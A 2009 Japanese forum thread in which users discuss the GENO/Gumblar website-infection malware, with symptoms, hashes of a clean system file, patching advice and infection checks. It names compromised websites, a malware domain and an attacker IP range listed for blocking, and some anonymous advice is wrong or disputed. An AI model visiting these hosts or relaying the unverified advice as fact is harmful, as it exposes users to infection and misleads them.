GENOウイルススレ　★5

・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD

感染が疑わしい人は迷わずクリーンインストール推奨です。
★Anubisレポート
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html

★GENOウイルスまとめ
ttp://www29.atwiki.jp/geno/
★このサイトは諸事情により内容を書き換え
ttp://www3.atword.jp/gnome/

★過去スレ
GENOウイルススレ　★4
http://pc11.2ch.net/test/read.cgi/sec/1242363241/
GENOウイルススレ　★3
http://pc11.2ch.net/test/read.cgi/sec/1240853183/
GENOウイルススレ　★2
http://pc11.2ch.net/test/read.cgi/sec/1239364066/
GENOウイルススレ
http://pc11.2ch.net/test/read.cgi/sec/1239152979/

感染予防対策

１．Adobe Flash Player の最新版にアップデート
２．Adobe Acrobat Reader の最新版にアップデート
３．NoScriptの導入（Firefoxの導入）
４．Adobe Acrobat Readerの JavaScript 機能OFF
５．危険IPのブロック


諸事情でAdobe Reader 最新版を使わざるを得ない場合
2009年4月29日現在の最新版バージョン9.1設定例

１．Adobe Readerを起動し「編集」メニューの「環境設定」
　　「Acrobat JavaScriptを使用」のチェックボックスをオフ（チェックを外す）
　　OKを押して設定確定後、Adobe Readerを終了。
↓
２．必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理
　　設定は SpeedUp - Fast がおすすめ。
　　　注意すべきは
　　　Acroform（拡張子なし）
　　　Annotations（拡張子なし）
　　　これら2つのチェックボックスをオン（チェックが入っている）状態にしておく必要がある。
　　　そうしないと Adobe Reader が起動しなかったりする。

　　　このとき追加作業として
　　　EScript.apiとEScript.JPNのチェックボックスをオフ（チェックを外す）状態にしておくと
　　　より安心かもしれない。

以下はお約束
上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。
またAdobe Readeｒ以外の環境設定をどうするかも各自考える必要があります。

以下攻撃されたサイト
小林製薬
ttp://www.kobayashi.co.jp/info/090512.html

国内の正規サイト改ざん：攻撃サイトを変え再襲来
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=1884


★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

現在拡散している Gumblar.cn
zlkonの亜種ですが以下のような特徴を持っています。

インジェクションコードが難解になった
バージョンチェックをユーザ側で行うため、サーバスクリプトの検出を回避している
　※一部のIDSはサーバスクリプトへのクエリを監視しており、クライアント側でやられても判断できない
感染が容易と思われるPC環境をよりピンポイントに判断している（このため、セキュ各社の自動検出が難しくなっている）
感染しない環境には何も返さない（更に検証が難しい）
亜種の「更新」の頻度が異常にすばやく、亜種がほとんどのセキュソフトを潜り抜けているので、シグネーチャ・ベースでの検出が難しい
　※検出率が上がる頃には次の種類になっている

感染の疑いがある場合
XP / 2000 の方は sqlsodbc.chm をチェックしてください。
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
ttp://www3.atword.jp/gnome/zlkon-gumblar-%E5%95%8F%E9%A1%8C%E3%81%AB%E9%96%A2%E3%81%97%E3%81%A6/

次スレいらないね

正常なsqlsodbc.chm
ファイルサイズ：50,727バイト
CRC32：B61C7A80
MD5：F639AFDE02547603A3D3930EE4BF8C12
SHA-1：FBDD32ED13D27E4102621E1067FDF3634F33B2C3

【感染の確認方法】
�@cmd.exe（コマンドプロント）、regedit.exe（レジストリエディタ）が起動するか確認する
　※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
　■確認方法
　１．スタートから「ファイル名を指定して実行」
　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　　「regedit.exe」と入力して「OK」ボタンを押す。
　　　※立ち上がったことを確認したら弄らず閉じること。
　３．同様に、「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　※立ち上がったことを確認したら�Aへ

�Asqlsodbc.chmのファイルサイズの確認を確認する
　■Windows XP:
　　改ざんされていなければ
　　C:\WINDOWS\system32\sqlsodbc.chm　50,727 bytes
　■Windows 2000:
　　そもそも存在しないはずなので、
　　C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
　■確認方法
　　１．スタートから「ファイル名を指定して実行」
　　２．「ファイルを指定して実行」という画面が出てくるので、入力欄に
　　「cmd.exe」（全部小文字で）と入力して「OK」ボタンを押す
　　　→背景が黒いウィンドウが開いた場合３へ
　　　→起動しない場合：感染疑い濃厚
　　３．背景が黒いウィンドウを選択。
　　　小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

�Bavast!（無料のアンチウイルスソフト）で確認

Flash Player はブラウザごとに最新であることを確認してください。
IEで最新でもFirefoxは古いままだったり、その逆もあります。

初心者や質問がある方は
http://changi.2ch.net/test/read.cgi/doujin/1242391122/
上記のスレに行くと優しく教えてくれるかもです

　　　　　　　　　 ／） 　　　　　　　　　　　　
　　　　　　　　　　　／／／） 　　　　　
　　　　　　　　　 ／,.=ﾞ''"／ 　　　　　　　　　　
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　キャッシュ消しゃーいいんだよ！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

確実な対策が出るまでネットはやめた方がいいってことですか？

でもネット繋がないと最新の対策を知れないというジレンマ

＞こっちは、初心者や質問　お断りのテンプレ専用スレにはできないものか？

Adobe Flash Player バージョンテスト
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

とりあえず対策とりつつ
余計なサイトを見に行かないようにしていればいいじゃないのかえ

avastって結構早めに対応してたっぽいね
今のカスペル試し終わったらつかおっかな？
あヴぃら・・・にはがっくりだよ

ところで前スレの痛いニュースの俺はどちらのスレも立てていない件について
まあどうでもいいんだけどな

人減ってきたけどまた昼になれば増えそうな予感

ノートン先生機嫌切れで買おうかと思ってたけどもうアバストでいいわ

１〜２スレまでまったりしてたのに
なんで急に加速しだしたんだ？

これってサイト持ちじゃなければあんまり関係ないかと思っていたら
クレカ情報も抜かれるの？
>>1だと重大性があんまりわからないね

>>21
次のスレにでも危ないってことテンプレに入れよう

>>20
隠蔽の成果で順調に感染拡大したんだろ

avast
感染サイト開くと警告
そのまま言う事聞けば感染しない

だけどそのサイトよく行ってるから誤検出かと思った
あざといぞこのウィルス

>>20
同人板の人達がなだれ込んできたから。

つい一昨日くらいまでavastでトロイ警告出してたサイトが今行ったらうんともすんともいわない
管理人対策してないっぽいのにどうしたんだろ

VirtualPC ＋ LINUX でネットしてれば大丈夫？

>>26
こっちもそういうサイト見つけた
どういうことだろう

一度感染したPCは
他人に乗っ取られているのと同じ
WindowsUpdateの変わりにウィルスを
いつでも最新の状態に更新してくれます

もう2chしか見ない

523 ：名無しさん＠お腹いっぱい。 [↓] ：2009/05/16(土) 00:47:48
>>1のサイトがいつなくなるかもわからないので、
現在感染中のサイトを転載しておく

p-frying■com/
www■zengozen■co■jp/
www■beauty-wed■co■jp/
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/

>>20
セキュ板的には4月上旬が旬のスレで段々過疎って来てたのが
ついこの間動画サイトSayMove!が感染してから
また人が増えたって感じだな

俺はインフルのニュー速＋かなんかのスレから着たわ
インフルエンザよりこっちのがよっぽど怖い

>>27
VirtualPCってことは、ホストOSはWindowsだよね？

こういうのいつまで我慢すればいいんだ

GENOの対応の悪さったらないね

Flash Playerの最新版をＤＬしてインスコしようとすると、

「申し訳ありません。googleツールバーをインストールできません。
>再試行　>キャンセル」

って出てきて何度も再試行したり最初からＤＬしてやり直してもインスコ出来ません。
何が原因でしょうか…

\Drivers32
に.acmとか.axで設定されてるファイルがあるんだけど・・・
感染してるのかな

>>37
グーグルツールバーなんてでるっけ？

　　■GENOウイルス無料配布キャンペーン■

　　　　　　★延長のお知らせ★

426 ：【5月16日3時時点での同人サイト感染状況】 [↓] ：2009/05/16(土) 03:12:03 ID:NMcHxmSp0
1.エヴァ（小説サーチ）
2.ヘタリア（同人サイト）
3.テニミュ（同人サイト及びファンサイト）
4.戦国BASARA（同人サイト）
5.リボーン（プチオンリーサイト及びファンサイト）
6.おお振り（アンソロサイト）
7.ジョジョの奇妙な冒険（同人サイト）
8.バイオハザード（同人サイト）
9.戦国無双（同人サイト）
10.メガテン（同人サイト）
11.乙女ゲームのVitamin（同人サイト）
12.鋼の錬金術師（同人サイト）
13.ガンダム00（同人サイト）
14.幻想水滸伝（同人サイト）
15.忍たま乱太郎（同人サイト）
16.遙かなる時空の中で（同人サイト）
17.Fate（同人サイト）

Adobe Flash Playerのインストール
Adobe Flash Playerのバージョン 10.0.22.87

今北。 なにこれこわい。
マカーは関係ないの？
俺のHPが感染しないようにするにはどうしたらいいんだ。

>>43

495 名前：名無しさん＠お腹いっぱい。[sage] 投稿日：2009/05/16(土) 00:33:38
>>491
JavaScriptは動いてもMac上ではexeが勝手に動かないから大丈夫だよ

先ほどの>>37ですがすみません、自己解決しました

googleツールバーを最新にしてから改めてFlash Playerをインストールしたところ
正常にインストールされました。

急に加速してるからビビったｗ
そんなに広まってるってことかよ・・
２ちゃんが一番安全だなんてｗ

感染後クリーンインストールするとして
WEBに関係ない画像やテキストなどのデータはバックアップとっても大丈夫でしょうか？

>>41
同人板のスレ見てたら
東方
サンレッド
ブレイブルー
コードギアス

も報告来てたよ

>>44
ありがとう。
それにしても恐ろしいな。友達に言っとかないと…

感染してた人いないです？
話がききたい

>>24
あのさ、avastで開こうとしたら警告出るでしょ？
で、すぐにIE閉じた場合、チェストに移動できる？

俺、ウイルスチェストに移動できなくてエラーになったことあるんだが、
この場合、感染してしまったのかな？

ただ、TempInternetFileの中身を全削除してから、全ドライブを
avastでチェックかけたところ、ウイルスは出なかった
regeditも正常に起動できた

ウイルスに感染したページを開く前に、avastが警告出して
未然防止できたってことで良いのかな？
ただ、何でチェストに移動できなかったのかが謎だけど・・・
すぐにIE閉じたから？

>>50
前スレ見ろ。

>>49
自分もすぐ家族とPCに疎い友達に言ったよ
最初はふーんて感じだったけど
小林製薬の事はなしたら「気をつける」ってさ

sqlsodbc
サイズ　49.5 KB (50,727 バイト)
ディスク上のサイズ　52.0 KB (53,248 バイト)

これって（　）内の数字が正しいから大丈夫だよね？

>>51
自分の場合は「そのまま閉じなさい」みたいに言われたから閉じるボタン押したよ
いつもだったらチェストに移動とか出るけどその時は「閉じる」一択だったわ
多分大丈夫
こちらもウィルスチェックしたけど何も出なかった

ＰＣ疎い人が「気をつける」って
何を気をつけるんだろうな…
ウィルスに感染してるサイトは特別な状態になってるとか
思ってそうだ

>>55
あれ、「チェストに移動する（推奨）」とか出なかった？
通常は、「削除」「チェストに移動」のどっちか選べるよね？

あまりに危険だから、チェストに移動できないタイプだったのかな？

>>54
md5で確認したファイルとサイズは同じだね
気になるならmd5見たほうがいいんじゃないかな

>>57
うん。普通のタイプのウィルスだったら「チェストに移動」が出るんだけど
今回のは出なかったよ
こういう事あるんだなー

>>59
俺の場合、「チェストに移動」って出てきたよ
だけど、クリックしたのに「エラー」になって移動できなかった

>>56
まぁウィルスという言葉が片隅にあるのとないのじゃ対策の仕方も変わるしいいんでないの

とりあえずはavastさんがどうにかしてくれてるわけね

cmd.exeで実行してdir C:\WINDOWS\system32\sqlsodbc.chmでエンター押したら
ファイルが見つかりませんって出たんだけどこれはアウト？
さっきまで1個のファイル　50,727バイトって表示されてたんだけど、
まとめサイトにのってるニフティのサイト開いてKasperskyもダウンロードしたあと試したらこうなった

>>47
断言は出来ない
出来ないけどたぶん大丈夫じゃね？
このウイルスは今のところCドライブのシステム関連を改変するだけっぽいので
それ以外の場所のテキストファイルや画像・動画ファイルとかはたぶん問題ないと思う
たぶんね(責任は持てないけど)

>>63
それ開けてる

>>63
普通にエクスプローラで見てみれば？

今日寝ずにオンラインスキャンしたりブラウザの設定したよ...

>>63
キャッシュ削除すればおｋってゲロさんが言ってた

キャッシュ消してもウィルスが消えるわけじゃないんですよね、社員さん

ゲロさんの言うキャッシュ削除は役に立たないってまとめwikiにあったが

>>38
そっちのファイルが何かわからないけど
こっちも調べたら.acmや.axがあったわ・・・・
けど、ググてみたら普通にレジストリにあるぽいんだよね・・・・
どうなんだろう

>>65>>66
開けてるけど1個のファイル　50,727バイトって出ないとアウトなんじゃないの
でもsqlsodbc.chmプロパティ開いてみたら50,727バイトなってた。
これはセーフなのかアウトなのか・・・

さっきまで女とヤりまくってたんだけど
実はウイルスのことで頭がいっぱいだったんだ。

この外国帰りの女。まさか豚ウイルス持ち帰ってねーだろな。
ってな。

>>72
カスペでウィルスチェックしたの？
全部

GENOってノートンで[94.247.2.0]-[94.247.3.255]を遮断してれば大丈夫？
その他の対策もやっといた方がいいんでしょうか

システムフォルダがWINDOWSじゃないとか
システムドライブがC:じゃないとか

>>72
お前はもうアウトだと思ってネット切っとけ…

>>74
カスパーインストールしようとすると「インストールノログを開くときにエラーが発生しました。
指定されたファイルの場所が存在し、書き込み可能であることを確認してください」って出てしまう

vipとかも蔓延してそうだな

>>78
まずウィルスチェックしてください
他のウィルス対策ソフトやオンラインスキャンが使えないならパソコン綺麗にしたほうが早いですね

Adobe Acrobat Reader自体ダウンロードしてなかったら大丈夫？
それとも対策として入れておいたほうがいい？

>>81
使わないなら入れなくていい

Java　script　を切ったり、各種ソフトウェアを
更新していれば、万が一書き換えが起きてるサイトを
踏んでも一応大丈夫だと思ってたんだけど
ここ数日で何か変わったのか？

>>83
亜種が出てきてるから何を信じればいいのかわからない状態

>>3
★感染を疑った人の報告
【OS】
【使用セキュリティソフト】
【疑った理由】
【症状】
【確認手段】
【結果】

javaスクリプトは切ったんだけど、それでも一応
javaスクリプト最新版にアップデートしておいた方が良い？

……「同人サイト」ってなに？
エロサイト？

うぁあああああああああああああああああああああああああああああああああああああああああああ


ああああああああああ・・・・・・あああああああああ・・・・・あああああああああああ


ぁぁぁぁぁぁ・・・・・・

まとめwikiのdir C:\WINDOWS\system32\sqlsodbc.chmをコピってエンターだとファイルが表示されませんて出たけど
コピペのdir C:\WINDOWS\system32\sqlsodbc.chmだと1個のファイル　50,727バイトってちゃんと出た。
何が違ったのかよくわからないけど一応報告

>>89
正常だけど
心配ならウィルスチェックしてみたらいいじゃないの

普通のサイトにトラップだなんて困るわ

このスレですら今の状態だからもう感染爆発は止められないな
ほとんどのメーカー製PCやソフトはマニュアルがPDFで
Acrobatが標準プリインストールされてしまっている
購入後アドビまで探しに行って更新するわけがないし
リカバリすればまた古いAcrobatが再インストールされる
自分のPCにAcrobatがあることすら知らないはず

…げ、evalあった
放置してる上、趣向が趣向だけに
もう閲覧してる人もいないようなサイトだから
ゆっくり考えてから行動するか…
他のサイトは無事で、最優先でチェックした項目に
感染の形跡無いのは何でだろ、亜種かな

>>47
本当に必要なファイルはVirusTotalにかけて、
それ以外の99パーセントのファイルは、一応スキャンした後で、外付けHDDとかに退避がおすすめ。
そしてしばらく凍結。

今は完全に　悪意の攻撃者　＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞＞セキュリティーベンダー
だから、1ヶ月（いや、最悪半年か？）くらい、不要ファイルは寝かせて、
セキュリティーベンダーのウィルス特定精度があがってきた頃に、外付けHDDの中を再スキャン。
その時は、マカフィー、ノートン、G-Data Kaspersky など複数ソフトで検索した方がいいよ。

>>57
なんかほのぼのしているね。
avast使ってないから、なんとも言えんけど、ローカルじゃなくて、ウェブとの通信で見つけたから、
わざわざローカルに保存してチェストに移動する必要がなかったのでは？
>>75
今、凶悪なのが、そこってだけで、前は違ったみたいよ。　だから十中八九また変わる。

まずウイルスチェックしようよ

ソロだとMeteorb楽なんだけど
マルチだと火力きついんだよね
∞ないと雷は乙ってるし、氷じゃソロ辛そうだしムズイ

おはよおー
前スレ終わるのはえーなｗ
てきとーに読んでみるか

なんという誤爆

なんかのRPG？

>>97
同人板とやらとこのスレを行き来してる人が多かったから
かなり盛り上がってたみたい

>>86
FlashとかadobeReaderとか
http://www.java.com/ja/download/installed.jsp
じゃなくて？

全てアンインストールするか最新じゃないと、脆弱性あるままだよ。
つまり、Javaスクリプトを切って、たとえ、このウィルスには大丈夫でも、
他のウィルスがスタンバイしている状態。

>>97
スレの勢いスゴすぎだよねｗ
俺も寝る前新スレとして登録したはずなのに、起きたら旧スレになっててﾜﾛﾀ
でもやっとそれだけの人が集まってきたってことなんだろうけど

女性同人はブログで満足せずサイト持ちが多いから影響が大きい

２ちゃん慣れしてるとこのウィルス本当に存在してんの？とか思ってしまう
だけど他のサイトに行って確認するのも怖いというチキン

>>104
こっちは小林のメールマガジンでこのウィルス知ったクチ
その時期に見てなかったから感染しなかったけどね

自分も>>54と同じだ
これって黒…？

それだけで決めてしまうのではなくって
オンラインチェックだとかPC挙動の見つつ判断したほうがいい

>>106
MD5でも比較した方がいい

カスペのオンラインスキャンに拒否られる。
やる気ねーだろ。

>>108
ごめん
MD5のやり方がわからん

ググれ

>>111
ググって変なサイトを見たら、また感染する危険があるだろｗ
ここで教えろｗ

こういう人は同人のほうのスレ行った方が優しくしてもらえる

MP5っと…
なんだ？ヘッケラーアンドコックって。

>>110
HashCheckerで探しましょう

http://ja.wikipedia.org/wiki/MD5

MD5（エムディーファイブ、Message Digest Algorithm 5）とは、与えられた入力に対して128ビットのハッシュ値を出力するハッシュ関数である。
1991年に開発されたMD5は、前身であるMD4の安全性を向上させたものである。開発者はMD4と同じく、MIT教授のロナルド・リベスト。
Linuxでは md5sum、FreeBSDでは md5 というコマンドが用意されており、これを用いてメッセージダイジェストを出力することが出来る。
出力されるメッセージダイジェストは、d41d8cd98f00b204e9800998ecf8427e （入力データ長が0バイトの場合）
の様に16進数の数字が並んだテキスト形式で出力され、これをフィンガプリント（指紋）やハッシュ値、あるいは単にMD5値と呼ぶ。
「MD5チェックサム」とも良く言われる。

MD5は、電子署名を必要とするアプリケーション向けに開発された。RSAで署名を生成する際に、メッセージを直接対象として
署名を生成するのではなく、メッセージのハッシュ値を生成し、ハッシュ値に対して署名を生成する。
ファイルを転送する際にそのファイルが破損していないことを確認するためにも用いられる。配布する側は、
ファイル配布時にそのファイルのMD5ハッシュ値（いわゆるMD5チェックサム）も同時に配布する。受信したユーザは
手元でファイルのMD5値を計算して、配布者の提示したMD5値と一致することを確認すれば良い。このような目的に
CRCを用いることもあるが、CRCは標準が複数存在するため現在ではあまり見られない。
またファイルが改竄されていないことを証明するためにも用いられる。これにより、作成者以外による
トロイの木馬やコンピュータウイルスなどの混入を防ぐことが出来る。 しかしながら、この場合MD5値は手元で計算できるのだから、
改竄済みのファイルのMD5値が同梱されている可能性がある。従って、改竄の恐れがある場合には、
ファイルに同封されているMD5値と比較するのではなく、MD5値だけは何かしら信頼できる方法で配布者から入手する必要がある。

FreeBSDはインストール可能なCDイメージと、それのMD5値を同時に配布している。
（MD5値の改変はないと仮定して）インストール可能なCDイメージが、途中で改変されていないことを確認してみる。
配布サイトから、ここでは 5.1-RELEASE-i386-miniinst.iso という最小構成のインストールイメージファイルと、
CHECKSUM.MD5 というMD5値（いわゆるMD5チェックサム）の書かれたテキストファイルをダウンロードする。
md5 コマンドを、イメージファイルに実行する。
localhost% md5 5.1-RELEASE-i386-miniinst.iso
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67
CHECKSUM.MD5の中身を確認し、一致していれば破損の可能性は低いことが分かる。
localhost% cat CHECKSUM.MD5
MD5 (5.1-RELEASE-i386-disc1.iso) = 3b6619cffb5f96e1acfa578badae372f
MD5 (5.1-RELEASE-i386-disc2.iso) = 2cfa746974210d68e96ee620bf842fb6
MD5 (5.1-RELEASE-i386-miniinst.iso) = 646da9ae5d90e6b51b06ede01b9fed67

>>112
なにこいつｗ

ブログやなんかで記事書いてもたいして読まれて無いし意味無いかな〜

　　　　　　　　　　　／／／）
　　　　　　　　　 ／,.=ﾞ''"／
　　　／　　　　 i f　,.r='"-‐'つ＿＿＿_　　　同人サイトなんてどうでもいいんだよ！！
　　/　　　　　 /　　　_,.-‐'~／⌒　　⌒＼
　　　　／　 　,i　　　,二ﾆ⊃（ ●）.　（●）＼
　　　/　 　　ﾉ　　　 ilﾞフ ::::::⌒（__人__）⌒::::: ＼
　　　　　　,ｲ｢ﾄ､　　,!,!|　　　　　|r┬-|　　　　　|
　　　　　/　iﾄヾヽ_/ｨ"＼ 　　 　 `ー'´ 　 　 ／

そういやＧＷ始まったばかりの頃にすげー重くなって
こりゃいかんとリカバリしたことあった
すごく軽くなって満足してたが今思えばウイルスに感染してたのか…

>>121
社員さんいいかげんにしてくださいよ

>>115
ありがとう
HASH CHECKER入れてみます
ネットつなげるの少し怖いなｗ

メインストリーム落ちしたOS使ってないと感染しないのにすごい盛り上がりっぷりだな

>>125
メインストリーム落ちしたOSって？

>>124
http://www.vector.co.jp/soft/winnt/util/se297267.html

NTTコミュニケーションズさん
　120.29.185.234(VPS-TOKYO2)
今日も踏んでみたけど放置のままなんだなあ・・・

>>116
Wikipediaの説明読んでも、全く理解できないんだが・・・
結局、MD５がGENOウイルスとどう関係しているの？

>>128
これってどんなサイト？

>>120
今日はすごいヒット数になるかもよ
まだ分かってないやつ多いと思う

>>124
少し怖い(セキュリティ的に)と思ったなら今後対策を常に講じれば良いだけです。
それに気がついただけでも良いことだと思いますよ。

小林製薬のページは今でも感染ばら撒いてる最中なの？
もう改善されて感染されちゃったよっていう伝達がされてるの？

>>133
メルマガより


いつも「暮らしのヒントお知らせ隊」メールマガジンをご愛読いただき
誠にありがとうございます。

この度、弊社サイトの一部（「暮らしのヒントお知らせ隊」含む）に
おいて第三者による改ざんが確認され、当該期間に下記サイトを閲覧
された方にウイルス感染の恐れがあることが判明いたしました。

■閲覧により感染した可能性のある期間
　5月10日（日）20時23分　〜　5月11日（月）21時27分

■改ざんされたサイト
　・暮らしのヒントお知らせ隊
　・ハナノア ブランドサイト
　・イージーファイバー ブランドサイト

上記期間に当該サイトにアクセスされた皆様におかれましては、誠に
お手数ではございますが、下記URLにて対応をご確認下さい。

http://www.kobayashi.co.jp/info/090512.html

平素から弊社サイトをご覧いただいている皆様にご迷惑をおかけしま
したこと、心よりお詫び申し上げます。
引き続きサイトの安全管理には万全を尽くしてまいりますので、今後とも
よろしくお願い申し上げます。

>>130
表示されないので謎

UAC切ってたvistaってやばいよね…？

>>134
ありがとう
対応されてるみたいだな
っつーか一応有名企業なのに誰か報道してくれんのか

>>129
意味がわからなければ半年romれ

>>138
ＲＯＭったらウィルス感染しちゃうわ

感染してる人ってしてない人より楽観的だよね

だから感染するんだよな

前スレ816
　816 名前： 名無しさん＠お腹いっぱい。 [sage] 投稿日： 2009/05/16(土) 03:13:52
　>>806 ぐぐったらこんなんでました
　ttp://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1020068155


あれ？リンク先・・・日付が・・・
それとこの一文

>ブラウザの一時ファイルを削除することで、ウイルスが駆除できるでしょう。

まさかgenoはこれを見て・・・

>>135
ていうかNTTのくせになにやってるんだろうね

>>142
GENOってパソコン関係のショップなんでしょ？
ありえない…

>>138
ROMっているだけで感染するんだが

>>139
テンプレをちゃんと見ればわかるだろ
わからなければわからない自分を呪え

危険なIPをルーターで全部フィルタリングした
一括登録できないからマジ疲れた…寝る

sqlsodbc.chm ってXPだけのファイル？

わからないなら違う方法で確認すりゃいいのに

>>41
確認しようとぐぐったけど　さっぱりわからんかったｗ

>>129
MD5は該当ファイルの中身を関数で計算し値を出力する。
同じファイルで計算すると同じ値になる。

*現状の*では既存ファイルの中身を書き換える。
だからMD５の値を比較すれば書きらえたかどうかが分かる。

改めてJavascript切ることの重要性がわかったわ
でも最近の公式サイトとかはJavascript、Flash使いまくりだからな〜
めんどうなんでほとんどWikipediaで済ましてるわ

>>152
なんであんなにフラッシュ使うんだろうね

>>129
今のところ、感染したPCのファイルの一部が　ウィルス作者に都合がいいように書き換えられるんだけど、
そんな違いが初心者にわかるわけないだろ？

もっと簡単に、
君のPCが、ウィルスに感染していない（書き換えられていないファイル）　だと判断するには、
書き換えられていない正常なファイルと比較して一致すれば良い。

だが、一致しているかを判断するのも大変そうだから、ツールを使って調べるわけ。
MD5ってのはファイルの指紋みたいなもので、
正常なファイルの指紋と　君のPCの同じ名前のファイル　の指紋が一致すれば
多分感染していなそうだ・・・という推測が成り立つ（感染した全部PCのファイル書き換えるとは言い切れないため）。

反対に感染しているファイルの指紋と　一致しちゃったら、100パーセント　感染しているってこと。
その指紋を取るソフトが>>124とか>>127なわけ。

みんなおはよう
ちなみに、Firefox系のブラウザでGoogle検索しただけで、感染したサイトが一番上ならGoogleの検索結果開いただけで感染する可能性あり。
Googleの先読み機能が影響してるので怖い方はabout:configからnetwork.prefetch-nextをfalseにすること推奨

>>148
Windows2000以外には存在する。

MD5云々は最終結論だとして、
sqlsodbcのファイルサイズを偽装したウイルスは確認されてるの？

>>153
制作会社がうまーなのかな

>>156
Meにも存在する？

>>155
Google以外の検索サイトは先読みしないんですかね？

アドバイス宜しくお願いします。

【OS】XP SP3
【使用セキュリティソフト】ウイルスバスター2009
【疑った理由】
セキュリティログを見てたらこんなログがでてた(その時間は嫁が使ってた。)
そのあとどんな処理をしたかは覚えていないらしい。

"フィッシング詐欺対策" "2009/05/08"
"時間" "URLアドレス" "偽装サイトブロック (ホスト名変換)" "脅威"
"15:55" "http://gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
　　　　　　　　　　　　　　　　　　　　　　　　　　　　 このWebサイトにはスパイウェアや不正プログラムが存在しているか、
　　　　　　　　　　　　　　　　　　　　　　　　　　　　 またはこのWebサイトは偽のWebサイトか、
　　　　　　　　　　　　　　　　　　　　　　　　　　　　 安全性が非常に低いと評価されているWebサイトです。"
"15:56" "http://gumblar.cn/rss/?id=5718066" "" "このWebサイトは安全でない可能性があります。
このWebサイトにはスパイウェアや不正プログラムが存在しているか、
またはこのWebサイトは偽のWebサイトか、
安全性が非常に低いと評価されているWebサイトです。"

【症状】
今のところ自覚症状なし
【確認手段】
sqlsodbc.chmのサイズ,MD5チェック、カスペオンラインスキャン、バスターウィルススキャン
cmd.exe、regedit.exeの起動チェック、特定サイトのアクセスチェック
ttp://www3.atword.jp/gnome/を参考にレジストリチェック
【結果】
sqlsodbc.chmのサイズ、MD5共に問題なし。cmd.exe、regedit.exeの起動OK。CPU、メモリ使用率も問題なし。CPU、メモリ使用率も問題なし。
カスペオンラインスキャン何も検知せず。レジストリも問題なし。
バスターウィルススキャンスパイウェアは検知したが、全てクッキーにある奴だけ。ウィルスは検知していない。

この結果でほぼ感染していないと思ってますが、皆様の助言を頂きたく書込みしました。
その他チェック項目等がありましたらご指導ください。

心配なら一週間回線切って寝ろ

>>154
129じゃないんだが、その指紋にあたるのがバイト数ってことですか？

つづき。
>>129
そのファイルの場所が>>7
指紋の値が>>6
だが、>>4の最後に
※sqlsodbc.chmを使わない亜種の存在が確認されていますので、この方法に完全に頼るのは危険かもしれません。
とあるので、これで大丈夫だから感染していない！　とは言い切れないわけ。
あくまで黒を特定する為の手段。

>>158
わざわざ重たいサイトつくって金もらうのね

>>165
特にゲーム会社のHPってトップページからフラッシュで重すぎるから
リンク貼られていても飛ばないようにしているわ・・・
見れるまで１分かかるとかイライラする

>>160
してないと思う

>>162
問題なし
あとhttp://のところはhXXp://とかにしろ

>>164
トン
わかりやすかった

Adobe Reader Speed-Upってどこで手に入るの？

前スレの>>216これか・・・

111 名前：GENO[sage] 投稿日：2009/05/16(土) 00:04:18 ID:Fd0/+V3h0
バイオハザードと戦国ゲームを扱っているサイトで感染確認

数日前に行った時はAVAST！が怒るくらいで済んだが次に行ったらAVAST！が激怒
もしかしたら新種か亜種か何かにここ数日で進化したか？
怒る→警告とこのサイトの通信遮断するところクリック
激怒→ウィルスをチェスト送り推奨で今現在チェストに放り込まれてる
ただ放り込まれているのはキャッシュなので過剰反応かもしれん
因みに火狐＋JSカットで隔離までいったｗ

とりあえず最初にいった時にウィルスの報告したんだけど対応していないソフトで
検査したらしく管理人さんは大丈夫って思っている
次にいった時はAVAST！激怒したので報告むりぽ

>>161
大丈夫だとおもいます
ですが実際見ているわけじゃないので

精神的に不安ならばクリーンインスコ
大丈夫そうならそのままで

安価ミス
×>>162
○>>161

エロゲー公式サイトとかは切ってても大丈夫なとこが多い

>>165
取引として考える一つの指標として
命令文・タグ、がいくつ存在するかってのがある
タグ打ちよりもFlashの方が命令文が多いのならば
そっちの方が金になるってことでFlashを使うってのもあるかもしれない

>>166
どんだけ遅い回線だよ

WindowsＭｅ使っているんだが、C:\WINDOWS\system32　に　sqlsodbc.chm　ってファイル無いんだが？

金儲けに走ると悪いことが起きるってばっちゃが

もうMeはお呼びじゃない
使うならオフライン専用で

直リンすみませんでした。

>>167様
ご回答有難うございます。
問題なさそうなので、安心して眠れます。

>>163
>>164に書いたとおり、指紋の値がMD5の値。
バイト数は、指紋にはならない。
バイト数（ファイルサイズ）なんて、不要なデータを追加すれば、いくらでも変えられるじゃん。

>>159
